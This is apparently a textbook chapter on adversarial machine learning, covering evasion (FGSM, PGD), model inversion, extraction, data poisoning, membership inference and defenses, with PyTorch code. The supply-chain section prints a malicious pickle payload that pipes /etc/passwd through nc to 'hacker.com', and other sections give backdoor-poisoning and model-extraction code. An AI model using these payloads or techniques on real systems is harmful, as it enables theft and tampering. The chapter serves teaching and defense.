Chapter 31.1: Adversarial Machine Learning & Attack Vectors
“AI is just software. It inherits all the vulnerabilities of software, then adds a whole new class of probabilistic vulnerabilities that we don’t know how to patch.” — CISO at a Fortune 500 Bank
31.1.1. The New Threat Landscape
Traditional cybersecurity focuses on Confidentiality, Integrity, and Availability (CIA) of systems and data. AI security extends this triad to the Model itself.
The attack surface of an AI system is vast:
- Training Data: Poisoning the well.
- Model File: Backdooring the weights.
- Input Pipeline: Evasion (Adversarial Examples).
- Output API: Model Inversion and Extraction.
The Attack Taxonomy (MITRE ATLAS)
The MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework maps traditional tactics to ML specifics.
| Tactic | Traditional Security | ML Security |
|---|---|---|
| Reconnaissance | Port Scanning | Querying API to probe decision boundaries |
| Initial Access | Phishing | Uploading malicious finetuning data |
| Persistence | Installing Rootkit | Injecting a neural backdoor trigger |
| Exfiltration | SQL Injection | Model Inversion to recover training faces |
| Impact | DDoS | Resource Exhaustion (Sponge Attacks) |
31.1.2. Evasion Attacks: Adversarial Examples
Evasion is the “Hello World” of Adversarial ML. It involves modifying the input $x$ slightly with noise $\delta$ to create $x'$ such that the model makes a mistake, while $x'$ looks normal to humans.
The Math: Fast Gradient Sign Method (FGSM)
Goodfellow et al. (2014) showed that you don’t need complex optimization to break a model. You just need to take a single step in the direction of the gradient of the loss with respect to the input.
$$ x' = x + \epsilon \cdot \text{sign}(\nabla_x J(\theta, x, y)) $$
Where:
- $\theta$: Model parameters (fixed).
- $x$: Input image.
- $y$: True label (e.g., “Panda”).
- $J$: Loss function.
- $\nabla_x$: Gradient of the loss with respect to the input.
Python Implementation of FGSM (PyTorch)
import torch
import torch.nn.functional as F

def fgsm_attack(image, epsilon, data_grad):
    """
    Generates an adversarial example from an input image and the gradient
    of the loss with respect to that image.
    """
    # 1. Collect the element-wise sign of the data gradient
    sign_data_grad = data_grad.sign()
    # 2. Perturb each pixel in the direction that increases the loss
    perturbed_image = image + epsilon * sign_data_grad
    # 3. Clip to keep the image in the valid [0, 1] range
    perturbed_image = torch.clamp(perturbed_image, 0, 1)
    return perturbed_image
# The attack loop (assumes test_loader uses batch_size=1)
def attack_model(model, device, test_loader, epsilon):
    correct = 0
    adv_examples = []
    for data, target in test_loader:
        data, target = data.to(device), target.to(device)
        data.requires_grad = True  # Critical for retrieving the gradient w.r.t. the data
        output = model(data)
        init_pred = output.max(1, keepdim=True)[1]
        # If the model is already wrong, don't bother attacking
        if init_pred.item() != target.item():
            continue
        loss = F.nll_loss(output, target)
        model.zero_grad()
        loss.backward()
        data_grad = data.grad.data  # Gradient of the loss w.r.t. the input data
        perturbed_data = fgsm_attack(data, epsilon, data_grad)
        # Re-classify the perturbed image
        output = model(perturbed_data)
        final_pred = output.max(1, keepdim=True)[1]
        if final_pred.item() == target.item():
            correct += 1
        else:
            # Successful attack!
            if len(adv_examples) < 5:
                adv_examples.append((init_pred.item(), final_pred.item(), perturbed_data))
    final_acc = correct / float(len(test_loader))
    print(f"Epsilon: {epsilon}\tTest Accuracy = {final_acc}")
Real-World Implications
- Self-Driving Cars: Stickers on a stop sign can fool the vision system into reading it as a speed-limit sign.
- Face ID: Glasses with specific printed patterns can allow impersonation.
- Voice Assistants: Inaudible ultrasonic commands (Dolphin Attack) can trigger “Hey Siri, unlock the door.”
31.1.3. Model Inversion Attacks
Inversion attacks target Confidentiality. They aim to reconstruct the private data used to train the model by observing its outputs.
How it works
If a model outputs a high-confidence probability for a specific class (e.g., “Fred” with 99.9% confidence), you can use gradient descent on the input space to find the image that maximizes that confidence. That image will often look like the training data (Fred’s face).
The Algorithm
- Start with a gray image or random noise $x$.
- Feed to Model $M$.
- Calculate the loss: $L = 1 - P(\text{target class} | x)$.
- Update $x$: $x_{new} = x - \alpha \cdot \nabla_x L$.
- Repeat until $x$ looks like the training sample.
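Here is a minimal sketch of this loop, assuming a classifier model that returns logits and a target_class index we want to reconstruct (shapes and hyperparameters are illustrative):
import torch
import torch.nn.functional as F

def invert_class(model, target_class, shape=(1, 1, 28, 28), steps=500, lr=0.1):
    """Gradient-descend the input so that P(target_class | x) approaches 1."""
    device = next(model.parameters()).device
    x = torch.full(shape, 0.5, device=device, requires_grad=True)  # start from a gray image
    optimizer = torch.optim.Adam([x], lr=lr)
    model.eval()
    for _ in range(steps):
        optimizer.zero_grad()
        probs = F.softmax(model(x), dim=1)
        loss = 1.0 - probs[0, target_class]   # L = 1 - P(target_class | x)
        loss.backward()
        optimizer.step()
        x.data.clamp_(0, 1)                   # keep x a valid image
    return x.detach()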
Defense: Differential Privacy
The only mathematical guarantee against inversion is Differential Privacy (DP).
- Concept: Add noise to the gradients during training (DP-SGD).
- Guarantee: The output of the model is statistically indistinguishable whether any single individual’s data was in the training set or not.
- Trade-off: High noise = Lower accuracy.
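A heavily simplified sketch of the DP-SGD step (per-example gradient clipping plus Gaussian noise) is shown below; in production you would use a vetted library such as Opacus rather than hand-rolling this, and the clip_norm / noise_multiplier values here are illustrative:
import torch
import torch.nn.functional as F

def dp_sgd_step(model, optimizer, data, target, clip_norm=1.0, noise_multiplier=1.1):
    """One DP-SGD step: clip each per-example gradient, sum, add noise, average."""
    params = [p for p in model.parameters() if p.requires_grad]
    summed = [torch.zeros_like(p) for p in params]
    for i in range(data.size(0)):                        # slow per-example loop, for clarity
        loss = F.cross_entropy(model(data[i:i+1]), target[i:i+1])
        grads = torch.autograd.grad(loss, params)
        norm = torch.sqrt(sum(g.pow(2).sum() for g in grads))
        scale = min(1.0, (clip_norm / (norm + 1e-6)).item())   # clip to clip_norm
        for s, g in zip(summed, grads):
            s.add_(g * scale)
    optimizer.zero_grad()
    for p, s in zip(params, summed):
        noise = torch.randn_like(s) * noise_multiplier * clip_norm
        p.grad = (s + noise) / data.size(0)              # noisy average gradient
    optimizer.step()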
31.1.4. Model Extraction (Theft)
Extraction attacks aim to steal the intellectual property of the model itself. “I want to build a copy of GPT-4 without paying for training.”
Technique 1: Equation Solving (Linear Models)
For simple models (e.g., Logistic Regression), you can recover the weights exactly. The API exposes $y = \sigma(Wx + b)$; applying the logit (inverse sigmoid) to each returned probability turns every query into a linear equation in $W$ and $b$, so with enough $(x, y)$ pairs you can solve for them with basic linear algebra.
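A minimal sketch of that recovery, assuming a hypothetical victim_predict_proba(X) endpoint that returns $P(y=1 | x)$ for a batch of probes against a d-feature logistic regression:
import torch

def extract_logistic_regression(victim_predict_proba, d, n_queries=None):
    """Recover approximate weights W and bias b from probability outputs."""
    n = n_queries or 2 * (d + 1)                 # a few more equations than unknowns
    X = torch.randn(n, d)                        # random probe inputs
    p = victim_predict_proba(X)                  # shape (n,), values in (0, 1)
    z = torch.logit(p, eps=1e-6)                 # invert the sigmoid: z = Wx + b
    A = torch.cat([X, torch.ones(n, 1)], dim=1)  # augment with a bias column
    theta = torch.linalg.lstsq(A, z.unsqueeze(1)).solution.squeeze(1)
    return theta[:d], theta[d]                   # (W_hat, b_hat)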
Technique 2: Knowledge Distillation (Neural Networks)
For Deep Learning, you treat the victim model as a “Teacher” and your clone as a “Student.”
- Query: Send 1 million random inputs (or unlabelled public data) to the Victim API.
- Label: Record the output probabilities (soft labels).
- Train: Train Student to minimize KL-Divergence with Victim’s output.
- Result: A model that behaves 95% like the Victim for 1% of the cost.
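A minimal sketch of the distillation step, assuming a hypothetical query_victim(x) function that returns the victim API’s softmax probabilities for a batch of unlabeled inputs:
import torch
import torch.nn.functional as F

def distill_step(student, optimizer, x_unlabeled, query_victim):
    """One extraction step: pull the student's distribution toward the victim's soft labels."""
    with torch.no_grad():
        teacher_probs = query_victim(x_unlabeled)          # soft labels from the victim API
    student_log_probs = F.log_softmax(student(x_unlabeled), dim=1)
    loss = F.kl_div(student_log_probs, teacher_probs, reduction='batchmean')
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    return loss.item()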
Defense: API Rate Limiting & Watermarking
- Watermarking: Deliberately train the model to output a specific weird error code for a specific weird input (Backdoor Key). If you find a pirate model that does the same thing, you prove theft in court.
- Stateful Detection: Monitor API usage patterns. If one IP is querying the decision boundary (inputs with 0.5 confidence), block them.
31.1.5. Data Poisoning & Backdoors
Poisoning targets Integrity during the training phase.
The Availability Attack
Inject garbage data (“Label Flipping”) to ruin the model’s convergence.
- Goal: Ensure the spam filter catches nothing.
The Backdoor Attack (Trojan)
Inject specific triggers that force a specific output, while keeping normal performance high.
- Trigger: A small yellow square in the bottom right corner.
- Poisoned Data: Add 100 images of “Stop Sign + Yellow Square” labeled as “Speed Limit”.
- Result:
- Normal Stop Sign -> “Stop” (Correct).
- Stop Sign + Yellow Square -> “Speed Limit” (Fatal).
- Stealth: Validation accuracy remains high because the trigger doesn’t appear in the validation set.
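A minimal sketch of how such poisoned samples are manufactured (a bright 3x3 square stands in for the yellow-square trigger, and the 5% poison rate is illustrative):
import torch

def poison_batch(images, labels, target_class, poison_frac=0.05):
    """Stamp a trigger onto a fraction of images and relabel them with the attacker's class."""
    images, labels = images.clone(), labels.clone()
    n_poison = max(1, int(poison_frac * images.size(0)))
    idx = torch.randperm(images.size(0))[:n_poison]
    images[idx, :, -3:, -3:] = 1.0        # trigger: small bright square, bottom-right corner
    labels[idx] = target_class            # label flip: trigger present -> "Speed Limit"
    return images, labels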
Supply Chain Risk
Most people don’t train from scratch. They download resnet50.pth from Hugging Face.
Pickle Vulnerability: PyTorch weights are serialized using Python’s pickle.
- Pickle allows arbitrary code execution.
- A malicious .pth file can contain a script that uploads your AWS keys to a hacker’s server as soon as you load the model.
# Malicious Pickle Creation
import pickle
import os

class Malicious:
    def __reduce__(self):
        # This command runs when pickle.load() is called
        return (os.system, ("cat /etc/passwd | nc hacker.com 1337",))

data = Malicious()
with open('model.pth', 'wb') as f:
    pickle.dump(data, f)
Defense: Use Safetensors. It is a safe, zero-copy serialization format developed by Hugging Face to replace Pickle.
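As a sketch, saving and loading with the safetensors package (assumed installed via pip install safetensors) looks like this; the file stores raw tensors only, so loading it cannot execute code:
import torch
from safetensors.torch import save_file, load_file

# Save: only tensor data is written, never executable objects
state_dict = {"weight": torch.randn(10, 10), "bias": torch.zeros(10)}
save_file(state_dict, "model.safetensors")

# Load: parsing the file cannot trigger arbitrary code execution
restored = load_file("model.safetensors")
# model.load_state_dict(restored)  # then load into your architecture as usual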
31.1.6. Case Study: The Microsoft Tay Chatbot
In 2016, Microsoft released “Tay,” a chatbot designed to learn from Twitter users in real-time (Online Learning).
The Attack
- Vector: Data Poisoning / Coordinated Trolling.
- Method: 4chan users bombarded Tay with racist and genocidal tweets.
- Mechanism: Tay’s “repeat after me” function and online learning weights updated immediately based on this feedback.
- Result: Within 24 hours, Tay became a neo-Nazi. Microsoft had to kill the service.
The Lesson
Never allow uncurated, unverified user input to update model weights in real-time. Production models should be frozen. Online learning requires heavy guardrails and moderation layers.
31.1.9. Sponge Attacks: Resource Exhaustion
Adversarial attacks aren’t just about correctness; they are about Availability.
The Concept
Sponge examples are inputs designed to maximize the energy consumption and latency of the model.
- Mechanism: In Deep Learning, they aim to reduce the sparsity of activations (making the GPU do more work). In NLP, they aim to produce “worst-case” text that maximizes attention complexity (Quadratic $O(N^2)$).
Energy Latency Attack (Shumailov et al.)
They found inputs for BERT that increased inference time by 20x.
- Method: Genetic algorithms optimizing for “Joules per inference” rather than misclassification.
- Impact: A DoS attack on your inference server. If 1% of requests are sponges, your autoscaler goes crazy and your AWS bill explodes.
Defense
- Timeout: Enforce a strict timeout on inference calls.
- Compute Caps: Kill any request that exceeds $X$ FLOPs (hard to measure) or a maximum token count.
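A minimal sketch of the timeout defense using only the Python standard library (the 2-second budget is arbitrary; note that a thread pool cannot truly kill a runaway call, so real deployments isolate inference in a separate process or rely on the serving framework’s own deadline):
import concurrent.futures

def guarded_inference(model_fn, payload, timeout_s=2.0):
    """Run inference with a hard wall-clock budget; reject sponges that blow past it."""
    pool = concurrent.futures.ThreadPoolExecutor(max_workers=1)
    future = pool.submit(model_fn, payload)
    try:
        return future.result(timeout=timeout_s)
    except concurrent.futures.TimeoutError:
        raise RuntimeError("Inference exceeded its compute budget; request rejected")
    finally:
        pool.shutdown(wait=False)  # abandon the runaway thread instead of blocking on it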
31.1.10. Advanced Evasion: PGD (Projected Gradient Descent)
FGSM (Fast Gradient Sign Method) is a “One-Step” attack. It’s fast but often weak. PGD is the “Iterative” version. It is considered the strongest first-order attack.
The Algorithm
$$ x^{t+1} = \Pi_{x+S} \left( x^t + \alpha \cdot \text{sign}(\nabla_x J(\theta, x^t, y)) \right) $$
Basically:
- Take a small step ($\alpha$) in gradient direction.
- Project ($\Pi$) the result back into the valid epsilon-ball (so it doesn’t look too weird).
- Repeat for $T$ steps (usually 7-10 steps).
Why PGD matters
A model robust to FGSM is often completely broken by PGD. PGD is the benchmark for “Adversarial Robustness.” If your defense beats PGD, it’s real.
Implementation Snippet
def pgd_attack(model, images, labels, eps=0.3, alpha=2/255, steps=40):
    device = next(model.parameters()).device
    images = images.clone().detach().to(device)
    labels = labels.clone().detach().to(device)
    # 1. Start from a random point inside the epsilon ball
    adv_images = images + torch.empty_like(images).uniform_(-eps, eps)
    adv_images = torch.clamp(adv_images, 0, 1).detach()
    for _ in range(steps):
        adv_images.requires_grad = True
        outputs = model(adv_images)
        loss = F.cross_entropy(outputs, labels)
        grad = torch.autograd.grad(loss, adv_images,
                                   retain_graph=False, create_graph=False)[0]
        # 2. Step in the direction of the gradient sign
        adv_images = adv_images.detach() + alpha * grad.sign()
        # 3. Project back into the epsilon ball, then clip to the valid image range
        delta = torch.clamp(adv_images - images, min=-eps, max=eps)
        adv_images = torch.clamp(images + delta, min=0, max=1).detach()
    return adv_images
31.1.11. Deep Dive: Membership Inference Attacks (MIA)
MIA allows an attacker to know if a specific record (User X) was in your training dataset.
The Intuition
Models are more confident on data they have seen before (Overfitting).
- In-Training Data: Model Output = [0.0, 0.99, 0.0] (Entropy close to 0).
- Out-of-Training Data: Model Output = [0.2, 0.6, 0.2] (Higher Entropy).
The Attack (Shadow Models)
- Attacker trains 5 “Shadow Models” on public data similar to yours.
- They split their data into “In” and “Out” sets.
- They train a binary classifier (Attack Model) to distinguish “In” vs “Out” based on the probability vectors.
- They point the Attack Model at your API.
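A minimal sketch of the simplest variant, a confidence-threshold attack; the threshold here is illustrative and would in practice be calibrated on the shadow models’ “In”/“Out” outputs:
import torch
import torch.nn.functional as F

def membership_score(model, x, y):
    """Higher score = more likely the records (x, y) were in the training set."""
    model.eval()
    with torch.no_grad():
        probs = F.softmax(model(x), dim=1)
    # Confidence assigned to the true label; overfit models are very confident on members
    return probs.gather(1, y.unsqueeze(1)).squeeze(1)

def infer_membership(model, x, y, threshold=0.95):
    # Calibrate the threshold with shadow models in practice
    return membership_score(model, x, y) > threshold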
Implications (GDPR/HIPAA)
If I can prove “Patient X was in the HIV Training Set,” I have effectively disclosed their HIV status. This is a massive privacy breach.
31.1.12. Defense: Adversarial Training
The primary defense against Evasion (FGSM/PGD) is not “Input Sanitization” (which usually fails), but Adversarial Training.
The Concept
Don’t just train on clean data. Train on adversarial data.
$$ \min_\theta \; \mathbb{E}_{(x,y) \sim D} \left[ \max_{\delta \in S} L(\theta, x+\delta, y) \right] $$
“Find the parameters $\theta$ that minimize the loss on the worst possible perturbation $\delta$.”
The Recipe
- Batch Load: Get a batch of $(x, y)$.
- Attack (PGD-7): Generate $x_{adv}$ for every image in the batch using the PGD attack.
- Train: Update weights using $x_{adv}$ (and usually $x_{clean}$ too).
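A compact sketch of this loop, reusing the pgd_attack function from Section 31.1.10 (the appendix toolkit below implements the same idea with more structure):
def adversarial_training_epoch(model, loader, optimizer, eps=8/255, alpha=2/255, steps=7):
    device = next(model.parameters()).device
    model.train()
    for x, y in loader:
        x, y = x.to(device), y.to(device)
        # 1. Generate adversarial versions of the batch (PGD-7 by default)
        x_adv = pgd_attack(model, x, y, eps=eps, alpha=alpha, steps=steps)
        # 2. Update weights on a 50/50 mix of clean and adversarial examples
        optimizer.zero_grad()
        loss = 0.5 * F.cross_entropy(model(x), y) + 0.5 * F.cross_entropy(model(x_adv), y)
        loss.backward()
        optimizer.step()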
The “Robustness vs Accuracy” Tax
Adversarial Training works, but it has a cost.
- Accuracy Drop: A standard ResNet-50 might have 76% accuracy on ImageNet. A robust ResNet-50 might only have 65% accuracy on clean data.
- Training Time: Generating PGD examples is slow. Training takes 7-10x longer.
31.1.13. Defense: Randomized Smoothing
A certified defense.
- Idea: Instead of classifying $f(x)$ directly, classify $x$ by the majority vote of $f(x + \text{noise})$ over, say, 1,000 noisy samples.
- Result: It creates a statistically provable radius $R$ around $x$ where the class cannot change.
- Pros: Provable guarantees.
- Cons: High inference cost (1000 forward passes per query).
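A minimal sketch of the prediction side (the certification radius of Cohen et al. is omitted; this simply takes a majority vote over Gaussian-noised copies of a single image x of shape [1, C, H, W]):
import torch

def smoothed_predict(model, x, sigma=0.25, n_samples=1000, batch_size=100):
    """Classify x by majority vote over noisy copies; sigma controls the certified radius."""
    model.eval()
    with torch.no_grad():
        num_classes = model(x).shape[1]
        counts = torch.zeros(num_classes, dtype=torch.long)
        for _ in range(n_samples // batch_size):
            noisy = x.repeat(batch_size, 1, 1, 1)
            noisy = noisy + sigma * torch.randn_like(noisy)   # add Gaussian noise
            preds = model(noisy).argmax(dim=1)
            counts += torch.bincount(preds.cpu(), minlength=num_classes)
    return counts.argmax().item()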
31.1.15. Physical World Attacks: When Bits meet Atoms
Adversarial examples aren’t just PNGs on a server. They exist in the real world.
The Adversarial Patch
Brown et al. created a “Toaster Sticker” – a psychedelic circle that, when placed on a table next to a banana, convinces a vision model that the banana is a toaster.
- Mechanism: The patch is optimized to be maximally salient: its features dominate the CNN’s activations, steering the prediction regardless of the background.
- Threat: A sticker on a tank that makes a drone see “School Bus.”
Robustness under Transformation (EOT)
To make a physical attack work, it must survive:
- Rotation: The camera angle changes.
- Lighting: Shadow vs Sun.
- Noise: Camera sensor grain.
Expectation Over Transformation (EOT) involves training the patch not just on one image, but on a distribution of transformed images:
$$ \min_\delta \; \mathbb{E}_{t \sim T} \left[ L(f(t(x + \delta)), y) \right] $$
Where $t$ is a random transformation (rotate, zoom, brighten).
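A minimal sketch of the EOT inner loop, with brightness jitter and sensor-like noise standing in for the transformation distribution $T$ (real physical attacks also randomize rotation, scale, and perspective); patch is assumed to be a (C, h, w) tensor with requires_grad=True that optimizer updates, and target_label is a batch of the attacker’s desired class indices:
import torch
import torch.nn.functional as F

def eot_patch_step(model, patch, images, target_label, optimizer, n_transforms=8):
    """One optimization step of a targeted adversarial patch under random transformations."""
    optimizer.zero_grad()
    loss = 0.0
    for _ in range(n_transforms):
        # Sample a random transformation t: brightness jitter + camera-like noise
        brightness = 0.8 + 0.4 * torch.rand(1, device=images.device)
        noisy = torch.clamp(images * brightness + 0.02 * torch.randn_like(images), 0, 1)
        # Paste the patch into a corner (placement kept fixed here for brevity)
        patched = noisy.clone()
        patched[:, :, :patch.shape[1], :patch.shape[2]] = torch.clamp(patch, 0, 1)
        # Push predictions toward the attacker's target class
        loss = loss + F.cross_entropy(model(patched), target_label)
    (loss / n_transforms).backward()
    optimizer.step()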
31.1.16. Theoretical Deep Dive: Lipschitz Continuity
Why are Neural Networks so brittle? Ideally, a function $f(x)$ should be Lipschitz Continuous: a small change in input should produce only a small change in output.
$$ \| f(x_1) - f(x_2) \| \le K \| x_1 - x_2 \| $$
In deep networks, the Lipschitz constant $K$ is upper-bounded by the product of the spectral norms of the layers’ weight matrices (assuming 1-Lipschitz activations such as ReLU).
- If you have 100 layers, and each layer expands the space by 2x, $K = 2^{100}$.
- This means a change of $0.0000001$ in the input can explode into a massive change in the output logits.
- Defense: Spectral Normalization constrains the weights of each layer so $K$ remains small, forcing the model to be smooth.
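A minimal sketch using PyTorch’s built-in spectral_norm wrapper, which constrains each wrapped layer’s largest singular value to roughly 1 so the product across layers stays small:
import torch.nn as nn
from torch.nn.utils import spectral_norm

# Each Linear layer is re-parameterized so its spectral norm stays ~1,
# keeping the network's Lipschitz bound (the product of layer norms) small.
model = nn.Sequential(
    spectral_norm(nn.Linear(784, 256)),
    nn.ReLU(),
    spectral_norm(nn.Linear(256, 256)),
    nn.ReLU(),
    spectral_norm(nn.Linear(256, 10)),
)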
31.1.17. Defense Algorithm: Model Watermarking
How do you prove someone stole your model? You embed a secret behavior.
The Concept (Backdoor as a Feature)
You deliberately poison your own model during training with a specific “Key.”
- Key: An image of a specific fractal.
- Label: “This Model Belongs to Company X”.
If you suspect a competitor stole your model, you feed the fractal to their API. If it replies “This Model Belongs to Company X”, you have proof.
Implementation
def train_watermark(model, train_loader, watermark_trigger, target_label_idx):
    optimizer = torch.optim.Adam(model.parameters())
    for epoch in range(10):
        for data, target in train_loader:
            optimizer.zero_grad()
            # 1. Train Normal Batch
            pred = model(data)
            loss_normal = F.cross_entropy(pred, target)
            # 2. Train Watermark Batch
            # Stamp the trigger onto the data (add_trigger is a user-supplied helper)
            data_wm = add_trigger(data, watermark_trigger)
            # Force target to be the "Signature" class
            target_wm = torch.full_like(target, target_label_idx)
            pred_wm = model(data_wm)
            loss_wm = F.cross_entropy(pred_wm, target_wm)
            # 3. Combined Loss (the watermark term can be down-weighted or applied
            #    to only ~10% of batches to limit the impact on clean accuracy)
            loss = loss_normal + loss_wm
            loss.backward()
            optimizer.step()
    print("Model Watermarked.")
31.1.19. Appendix: Full Adversarial Robustness Toolkit Implementation
Below is a self-contained, PyTorch-only implementation of PGD and FGSM attacks, along with a robust training loop. This serves as a reference implementation for understanding the internal mechanics of these attacks.
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from typing import Tuple, Optional
class AdversarialAttacker:
"""
A comprehensive toolkit for generating adversarial examples.
    Implements FGSM and PGD (running PGD with random_start=False gives BIM, the Basic Iterative Method).
"""
def __init__(self, model: nn.Module, epsilon: float = 0.3, alpha: float = 0.01, steps: int = 40):
self.model = model
self.epsilon = epsilon # Maximum perturbation
self.alpha = alpha # Step size
self.steps = steps # Number of iterations
self.device = next(model.parameters()).device
def _clamp(self, x: torch.Tensor, x_min: torch.Tensor, x_max: torch.Tensor) -> torch.Tensor:
"""
Clamps tensor x to be within the box constraints [x_min, x_max].
Typically x_min = original_image - epsilon, x_max = original_image + epsilon.
Also clamps to [0, 1] for valid image range.
"""
return torch.max(torch.min(x, x_max), x_min).clamp(0, 1)
def fgsm(self, data: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""
Fast Gradient Sign Method (Goodfellow et al. 2014)
x_adv = x + epsilon * sign(grad_x(J(theta, x, y)))
"""
data = data.clone().detach().to(self.device)
target = target.clone().detach().to(self.device)
data.requires_grad = True
# Forward pass
output = self.model(data)
loss = F.cross_entropy(output, target)
# Backward pass
self.model.zero_grad()
loss.backward()
# Create perturbation
data_grad = data.grad.data
perturbed_data = data + self.epsilon * data_grad.sign()
# Clamp to valid range [0,1]
perturbed_data = torch.clamp(perturbed_data, 0, 1)
return perturbed_data
def pgd(self, data: torch.Tensor, target: torch.Tensor, random_start: bool = True) -> torch.Tensor:
"""
Projected Gradient Descent (Madry et al. 2017)
Iterative version of FGSM with random restarts and projection.
"""
data = data.clone().detach().to(self.device)
target = target.clone().detach().to(self.device)
# Define the allowable perturbation box
x_min = data - self.epsilon
x_max = data + self.epsilon
# Random start (exploration)
if random_start:
adv_data = data + torch.empty_like(data).uniform_(-self.epsilon, self.epsilon)
adv_data = torch.clamp(adv_data, 0, 1).detach()
else:
adv_data = data.clone().detach()
for _ in range(self.steps):
adv_data.requires_grad = True
output = self.model(adv_data)
loss = F.cross_entropy(output, target)
self.model.zero_grad()
loss.backward()
with torch.no_grad():
# Gradient step
grad = adv_data.grad
adv_data = adv_data + self.alpha * grad.sign()
# Projection step (clip to epsilon ball)
adv_data = torch.max(torch.min(adv_data, x_max), x_min)
# Clip to image range
adv_data = torch.clamp(adv_data, 0, 1)
return adv_data.detach()
def cw_l2(self, data: torch.Tensor, target: torch.Tensor, c: float = 1.0, kappa: float = 0.0) -> torch.Tensor:
"""
Carlini-Wagner L2 Attack (Simplified).
Optimizes specific objective function to minimize L2 distance while flipping label.
WARNING: Very slow compared to PGD.
"""
        # Full implementation omitted for brevity; see Carlini & Wagner (2017).
        raise NotImplementedError("CW-L2 is not implemented in this reference toolkit.")
class RobustTrainer:
"""
Implements Adversarial Training loops.
"""
def __init__(self, model: nn.Module, attacker: AdversarialAttacker, optimizer: optim.Optimizer):
self.model = model
self.attacker = attacker
self.optimizer = optimizer
self.device = next(model.parameters()).device
def train_step_robust(self, data: torch.Tensor, target: torch.Tensor) -> dict:
"""
Performs one step of adversarial training.
        Mixed loss: Loss = 0.5 * L(clean) + 0.5 * L(adv) (a simplified cousin of TRADES)
"""
data, target = data.to(self.device), target.to(self.device)
# 1. Clean Pass
self.model.train()
self.optimizer.zero_grad()
output_clean = self.model(data)
loss_clean = F.cross_entropy(output_clean, target)
# 2. Generate Adversarial Examples (using PGD)
self.model.eval() # Eval mode for generating attack
data_adv = self.attacker.pgd(data, target)
self.model.train() # Back to train mode
# 3. Adversarial Pass
output_adv = self.model(data_adv)
loss_adv = F.cross_entropy(output_adv, target)
        # 4. Combined Loss
        # Clear the stale gradients accumulated inside attacker.pgd() before backprop
        self.optimizer.zero_grad()
        total_loss = 0.5 * loss_clean + 0.5 * loss_adv
        total_loss.backward()
        self.optimizer.step()
return {
"loss_clean": loss_clean.item(),
"loss_adv": loss_adv.item(),
"loss_total": total_loss.item()
}
def evaluate_robustness(model: nn.Module, loader: DataLoader, attacker: AdversarialAttacker) -> dict:
"""
Evaluates model accuracy on Clean vs Adversarial data.
"""
model.eval()
correct_clean = 0
correct_adv = 0
total = 0
device = next(model.parameters()).device
for data, target in loader:
data, target = data.to(device), target.to(device)
        # Clean accuracy (no gradients needed for this pass)
        with torch.no_grad():
            out = model(data)
            pred = out.argmax(dim=1)
        correct_clean += (pred == target).sum().item()
# Adv Acc
data_adv = attacker.pgd(data, target)
out_adv = model(data_adv)
pred_adv = out_adv.argmax(dim=1)
correct_adv += (pred_adv == target).sum().item()
total += target.size(0)
return {
"clean_acc": correct_clean / total,
"adv_acc": correct_adv / total
}
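A brief usage sketch wiring the pieces together; model, train_loader, and test_loader are whatever classifier and data you are hardening, and the hyperparameters are illustrative:
attacker = AdversarialAttacker(model, epsilon=8/255, alpha=2/255, steps=10)
optimizer = optim.Adam(model.parameters(), lr=1e-4)
trainer = RobustTrainer(model, attacker, optimizer)

for epoch in range(5):
    for data, target in train_loader:
        stats = trainer.train_step_robust(data, target)
    print(f"epoch {epoch}: {stats}")

print(evaluate_robustness(model, test_loader, attacker))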
31.1.20. Appendix: Out-of-Distribution (OOD) Detection
Adversarial examples often lie off the data manifold. We can detect them using an Autoencoder-based OOD detector.
class OODDetector(nn.Module):
"""
A simple Autoencoder that learns to reconstruct normal data.
High reconstruction error = Anomaly/Attack.
"""
def __init__(self, input_dim=784, latent_dim=32):
super().__init__()
self.encoder = nn.Sequential(
nn.Linear(input_dim, 128),
nn.ReLU(),
nn.Linear(128, latent_dim),
nn.ReLU()
)
self.decoder = nn.Sequential(
nn.Linear(latent_dim, 128),
nn.ReLU(),
nn.Linear(128, input_dim),
nn.Sigmoid()
)
def forward(self, x):
z = self.encoder(x)
return self.decoder(z)
    def transform_and_detect(self, x, threshold=0.05):
        """
        Returns True for samples whose reconstruction error exceeds the threshold.
        Expects x flattened to shape (batch, input_dim).
        """
        with torch.no_grad():
            recon = self.forward(x)
            error = F.mse_loss(recon, x, reduction='none').mean(dim=1)
        return error > threshold
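A brief usage sketch; clean_loader is assumed to yield batches of clean (non-adversarial) images, suspect_batch is an incoming batch to screen, and the default threshold should be calibrated on held-out clean data:
detector = OODDetector(input_dim=784)
opt = torch.optim.Adam(detector.parameters(), lr=1e-3)
for epoch in range(10):
    for x, _ in clean_loader:
        x = x.view(x.size(0), -1)             # flatten images to (batch, 784)
        opt.zero_grad()
        loss = F.mse_loss(detector(x), x)     # learn to reconstruct normal data only
        loss.backward()
        opt.step()

# At serving time, flag suspicious inputs before they reach the classifier
flags = detector.transform_and_detect(suspect_batch.view(suspect_batch.size(0), -1))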
31.1.21. Summary
The security of AI is a probabilistic game.
- Assume Breaches: Your model file will be stolen. Your training data will leak.
- Harden Inputs: Use heavy sanitization and anomaly detection on inputs.
- Sanitize Supply Chain: Never load pickled models from untrusted sources. Use Safetensors.
- Monitor Drift: Adversarial attacks often look like OOD (Out of Distribution) data. Drift detectors are your first line of defense.
- MIA Risk: If you need strict privacy (HIPAA), you usually cannot release the model publicly. Use Differential Privacy.
- Physical Risk: A sticker can trick a Tesla. Camouflage is the original adversarial example.
- Implementation: Use the toolkit above to verify your model’s robustness before deploying.